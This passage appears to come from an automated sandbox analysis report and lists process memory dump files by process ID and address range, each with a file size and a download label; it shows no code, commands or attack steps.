memory/2816-308-0x000001EC80BE0000-0x000001EC80BE2000-memory.dmp

Filesize
8KB

Download
memory/2816-318-0x000001EC80BE0000-0x000001EC80BE2000-memory.dmp

Filesize
8KB

Download
memory/2836-192-0x0000000000620000-0x0000000000621000-memory.dmp

Filesize
4KB

Download
memory/2836-208-0x000000001B3A0000-0x000000001B3A2000-memory.dmp

Filesize
8KB

Download
memory/2912-502-0x000001ECAE8A0000-0x000001ECAE912000-memory.dmp

Filesize
456KB

Download
memory/3080-246-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/3236-250-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/3632-315-0x0000015C774A0000-0x0000015C774ED000-memory.dmp

Filesize
308KB

Download
memory/3632-303-0x0000015C77560000-0x0000015C775D2000-memory.dmp

Filesize
456KB

Download
memory/3632-298-0x0000015C77120000-0x0000015C77122000-memory.dmp

Filesize
8KB

Download
memory/3632-299-0x0000015C77120000-0x0000015C77122000-memory.dmp

Filesize
8KB

Download
memory/3644-405-0x0000000077600000-0x000000007778E000-memory.dmp

Filesize
1.6MB

Download
memory/3692-348-0x0000000004D10000-0x0000000005316000-memory.dmp

Filesize
6.0MB

Download
memory/3692-304-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3756-242-0x0000000006240000-0x000000000638C000-memory.dmp

Filesize
1.3MB

Download
memory/3956-488-0x0000000004400000-0x0000000004720000-memory.dmp

Filesize
3.1MB

Download
memory/4068-218-0x00000000009C0000-0x00000000009C1000-memory.dmp

Filesize
4KB

Download
memory/4068-240-0x0000000002C60000-0x0000000002C61000-memory.dmp

Filesize
4KB

Download
memory/4068-255-0x0000000005340000-0x0000000005341000-memory.dmp

Filesize
4KB

Download
memory/4220-461-0x00000000020E0000-0x0000000002124000-memory.dmp

Filesize
272KB

Download
memory/4220-465-0x0000000000400000-0x000000000046B000-memory.dmp

Filesize
428KB

Download
memory/4220-446-0x00000000005E0000-0x0000000000607000-memory.dmp

Filesize
156KB

Download
memory/4320-300-0x0000000001800000-0x0000000001801000-memory.dmp

Filesize
4KB

Download
memory/4320-295-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

Filesize
4KB

Download
memory/4320-358-0x00000000033D0000-0x00000000033D1000-memory.dmp

Filesize
4KB

Download
memory/4352-301-0x0000000000B87000-0x0000000000C88000-memory.dmp

Filesize
1.0MB

Download
memory/4352-307-0x0000000000D10000-0x0000000000D6D000-memory.dmp

Filesize
372KB

Download
memory/4468-457-0x00000000020F0000-0x0000000002167000-memory.dmp

Filesize
476KB

Download
memory/4532-409-0x00000000010D0000-0x00000000013F0000-memory.dmp

Filesize
3.1MB

Download
memory/4532-429-0x0000000000EC0000-0x0000000000ED1000-memory.dmp

Filesize
68KB

Download
memory/4544-319-0x00000235890D0000-0x00000235890D2000-memory.dmp

Filesize
8KB

Download
memory/4544-396-0x000002358AA70000-0x000002358AA8B000-memory.dmp

Filesize
108KB

Download
memory/4544-352-0x0000023589050000-0x00000235890C2000-memory.dmp

Filesize
456KB

Download
memory/4544-434-0x000002358BB00000-0x000002358BC05000-memory.dmp

Filesize
1.0MB

Download
memory/4592-371-0x0000000077600000-0x000000007778E000-memory.dmp

Filesize
1.6MB

Download
memory/4592-485-0x0000000005C40000-0x0000000005C41000-memory.dmp

Filesize
4KB

Download
memory/4768-414-0x0000000000BB0000-0x0000000000CFA000-memory.dmp

Filesize
1.3MB

Download
memory/5096-391-0x0000000077600000-0x000000007778E000-memory.dmp

Filesize
1.6MB

Download
memory/5096-439-0x0000000003C20000-0x0000000003C21000-memory.dmp

Filesize
4KB

Download